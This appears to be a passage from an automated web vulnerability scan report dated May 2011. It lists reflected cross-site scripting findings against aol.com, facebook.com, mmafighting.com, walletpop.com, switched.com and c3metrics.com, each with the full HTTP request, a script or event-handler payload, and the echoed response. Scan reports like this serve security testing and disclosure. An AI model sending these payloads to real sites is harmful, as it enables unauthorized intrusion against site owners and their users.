Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900afc84"><script>alert(1)</script>6f0b38780b0&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900afc84"><script>alert(1)</script>6f0b38780b0&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.241. http://mmafighting.com/traffic/ [pw parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The value of the pw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8e31"><script>alert(1)</script>4f4b553212a was submitted in the pw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2Fa8e31"><script>alert(1)</script>4f4b553212a&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:34 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:34 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2Fa8e31"><script>alert(1)</script>4f4b553212a&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2Fa8e31"><script>alert(1)</script>4f4b553212a&cb=1514902365">
...[SNIP]...

5.242. http://mmafighting.com/traffic/ [rsv parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The value of the rsv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9694"><script>alert(1)</script>7955c6a01c4 was submitted in the rsv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=a9694"><script>alert(1)</script>7955c6a01c4&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:34 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:34 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=a9694"><script>alert(1)</script>7955c6a01c4&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=&rsv=a9694"><script>alert(1)</script>7955c6a01c4&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.243. http://mmafighting.com/traffic/ [rv parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The value of the rv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ce38"><script>alert(1)</script>d8eb1374456 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=9ce38"><script>alert(1)</script>d8eb1374456&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=9ce38"><script>alert(1)</script>d8eb1374456&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=&lg=&rv=9ce38"><script>alert(1)</script>d8eb1374456&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.244. http://mmafighting.com/traffic/ [t parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 339ba"><script>alert(1)</script>2c56b47c49f was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js339ba"><script>alert(1)</script>2c56b47c49f&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:32 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:32 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js339ba"><script>alert(1)</script>2c56b47c49f&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js339ba"><script>alert(1)</script>2c56b47c49f&bv=&os=19931900&tz=&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=15149023
...[SNIP]...

5.245. http://mmafighting.com/traffic/ [tz parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mmafighting.com
Path:	/traffic/

Issue detail

The value of the tz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a79a"><script>alert(1)</script>deb821a73e8 was submitted in the tz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /traffic/?t=js&bv=&os=19931900&tz=5a79a"><script>alert(1)</script>deb821a73e8&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365 HTTP/1.1
Host: mmafighting.com
Proxy-Connection: keep-alive
Referer: http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 00:57:33 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 01:27:33 GMT
Content-length: 352
Content-type: text/html
Location: http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=5a79a"><script>alert(1)</script>deb821a73e8&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365

<html>
<body>
Page relocated <a href="http://www.mmafighting.com/traffic/?t=js&bv=&os=19931900&tz=5a79a"><script>alert(1)</script>deb821a73e8&lg=&rv=&rsv=&pw=%2F2011%2F05%2F04%2Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%2F%3Ficid%3Dmaing-grid7%257Cmain5%257Cdl4%257Csec3_lnk1%257C60545%2F&cb=1514902365">
...[SNIP]...

5.246. http://switched.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://switched.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f206"><script>alert(1)</script>38c73d58ef7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?4f206"><script>alert(1)</script>38c73d58ef7=1 HTTP/1.1
Host: switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 10:55:39 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:25:39 GMT
Content-length: 136
Content-type: text/html
Location: http://www.switched.com/?4f206"><script>alert(1)</script>38c73d58ef7=1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://www.switched.com/?4f206"><script>alert(1)</script>38c73d58ef7=1">here.</a>
</body>
</html>

5.247. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload e3ed5<script>alert(1)</script>67ac9eab662 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=aol&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803e3ed5<script>alert(1)</script>67ac9eab662; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; SERVERID=s11

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:14 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:57:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-57-14_886262241304557034; expires=Tue, 03-May-2016 00:57:14 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=aol_886262241304557034; expires=Thu, 05-May-2011 01:12:14 GMT; path=/; domain=c3metrics.com
Content-Length: 6696
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='aol';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803e3ed5<script>alert(1)</script>67ac9eab662';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='886262241304557034';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcall
...[SNIP]...

5.248. http://walletpop.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://walletpop.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8a5f"><script>alert(1)</script>35907aad5ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?d8a5f"><script>alert(1)</script>35907aad5ac=1 HTTP/1.1
Host: walletpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 05 May 2011 10:56:17 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Thu, 05 May 2011 11:26:17 GMT
Content-length: 137
Content-type: text/html
Location: http://www.walletpop.com/?d8a5f"><script>alert(1)</script>35907aad5ac=1
Keep-Alive: timeout=5, max=35
Connection: Keep-Alive

<html>
<body>
Page relocated <a href="http://www.walletpop.com/?d8a5f"><script>alert(1)</script>35907aad5ac=1">here.</a>
</body>
</html>

5.249. http://www.aol.com/ [dlact cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/

Issue detail

The value of the dlact cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1124"-alert(1)-"6a0d04d96d1 was submitted in the dlact cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~0; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2a1124"-alert(1)-"6a0d04d96d1

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=47F3597F5AADCEB36B262F261CE5067A; Path=/aol
Content-Length: 63405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var dlImps = new Array();dlImps["dl1"]=true;
var dlact = "dl2a1124"-alert(1)-"6a0d04d96d1";
var dlduration = 10000;
var dloverrided = false;
var dlcurr = 1;
var dltotal = 13;
var paramslot = "dynamiclead";
var dloffset = 0;
var ftmslo
...[SNIP]...

5.250. http://www.aol.com/ [rrpmo1 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.aol.com
Path:	/

Issue detail

The value of the rrpmo1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d687"-alert(1)-"65e99ea59a8 was submitted in the rrpmo1 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1304574981881-Repeat%7C1367646981881%3B%20s_nrgvo%3DRepeat%7C1367646981882%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1304556981389~05d687"-alert(1)-"65e99ea59a8; stips5=1; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:45 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-24-45.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=5BD36E2786B24B66765E62769A9E47BB; Path=/aol
Content-Length: 63383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<script type="text/javascript">
var origUrl="http%3A%2F%2Fwww.aol.com%2F";
var ae_url="https://www.aol.com/aimexpress.jsp";
cookies.set("rrpmo1","rr1~2~1304556981389~05d687"-alert(1)-"65e99ea59a8");</script>
...[SNIP]...

5.251. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Alexander-Bucky-Jordan/1242845259

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b was submitted in the REST URL parameter 3. This input was echoed as e76bc<img src=a onerror=alert(1)>b0233c9330b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /people/Alexander-Bucky-Jordan/1242845259e76bc<img%20src%3da%20onerror%3dalert(1)>b0233c9330b HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 302 Found
Location: /1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.41
Connection: close
Date: Thu, 05 May 2011 11:43:12 GMT
Content-Length: 55

/1242845259e76bc<img src=a onerror=alert(1)>b0233c9330b

5.252. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/people/Bucky-Jordan%20/100000824820783

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1c030<img%20src%3da%20onerror%3dalert(1)>5ccc611056 was submitted in the REST URL parameter 3. This input was echoed as 1c030<img src=a onerror=alert(1)>5ccc611056 in the application's response.

